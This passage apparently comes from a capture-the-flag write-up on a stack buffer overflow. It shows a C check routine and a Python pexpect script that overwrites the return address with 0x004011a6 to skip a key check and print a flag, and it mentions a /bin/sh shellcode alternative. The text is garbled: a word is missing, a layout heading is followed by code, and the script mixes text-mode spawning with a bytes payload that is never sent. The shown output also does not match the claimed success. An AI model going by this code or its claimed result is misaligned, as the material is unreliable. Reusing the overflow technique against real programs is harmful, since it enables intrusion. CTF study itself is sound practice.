The relevant part of the binary's source:

// compare with a secret stored in the .rodata section
if (strcmp(key, secret_key) != 0)
    return 0;

if (check_key(buf) == 0) {
    puts("Invalid key!");
    exit(1);
}
puts(flag);
return 0;

Therefore we want our to be 0x004011a6.

3.2 Crafting the payload

The stack layout (simplified) at the moment of the overflow:

import pexpect
import struct

BIN = "./hub"              # placeholder: path to the challenge binary (assumed, not given on the page)
TARGET_ADDR = 0x004011a6   # the address chosen above

def main():
    p = pexpect.spawn(BIN, encoding='utf-8')
    p.expect("Enter your hub key:")
    # build payload
    payload = b'A' * 64                        # fill buffer
    payload += b'B' * 8                        # overwrite saved RBP
    payload += struct.pack("<Q", TARGET_ADDR)  # overwrite RIP

Running it:

=== Welcome to the HD Bike Hub ===
Enter your hub key: flagh0p3_y0u_f0und_th3_h1d3_b1k3

Success! The flag is printed without ever passing the check_key test. If you prefer a "classic" shellcode approach, you can place a /bin/sh payload on the stack and return to it.